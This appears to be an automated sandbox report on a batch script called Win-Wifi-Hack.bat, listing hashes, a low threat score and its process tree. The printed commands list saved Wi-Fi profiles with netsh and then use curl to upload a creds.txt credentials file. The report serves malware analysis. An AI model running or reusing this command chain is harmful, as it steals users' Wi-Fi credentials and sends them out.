Analysis
- max time kernel: 16s
- max time network: 21s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/01/2024, 07:59
Static task: static1
Behavioral task: behavioral1
- Sample: Win-Wifi-Hack.bat
- Resource: win10v2004-20231215-en
- 1 signatures
- 150 seconds
General
- Target: Win-Wifi-Hack.bat
- Size: 696B
- MD5: 869c35a019cab10d5ee5d3929c8ddf8f
- SHA1: 3a82aa458d47bd373a2ec4aaa585c0bf9b923edc
- SHA256: 732be9a3433a3e31785a2b0147a71b30fda3081a12b6279d16707377253e08ec
- SHA512: 681aef6ef6b921f9195855a00c015c7b91297fbe33f7c3475b6bbeb7ac951699993ad1f5863d55c1c407f5ec011d3ead28616e989bc29694d2bf62658c76e49c
Score: 1/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (6 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 876 wrote to memory of 1940 | 876 | cmd.exe | 86 |
| PID 876 wrote to memory of 1940 | 876 | cmd.exe | 86 |
| PID 876 wrote to memory of 3620 | 876 | cmd.exe | 87 |
| PID 876 wrote to memory of 3620 | 876 | cmd.exe | 87 |
| PID 876 wrote to memory of 4296 | 876 | cmd.exe | 90 |
| PID 876 wrote to memory of 4296 | 876 | cmd.exe | 90 |
Processes
- C:\Windows\system32\cmd.exe (PID: 876)
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Win-Wifi-Hack.bat"
  Suspicious use of WriteProcessMemory
  - C:\Windows\system32\netsh.exe (PID: 1940)
    netsh wlan show profiles
  - C:\Windows\system32\findstr.exe (PID: 3620)
    findstr /R /C:"[ ]:[ ]"
  - C:\Windows\system32\curl.exe (PID: 4296)
    curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Temp\creds.txt"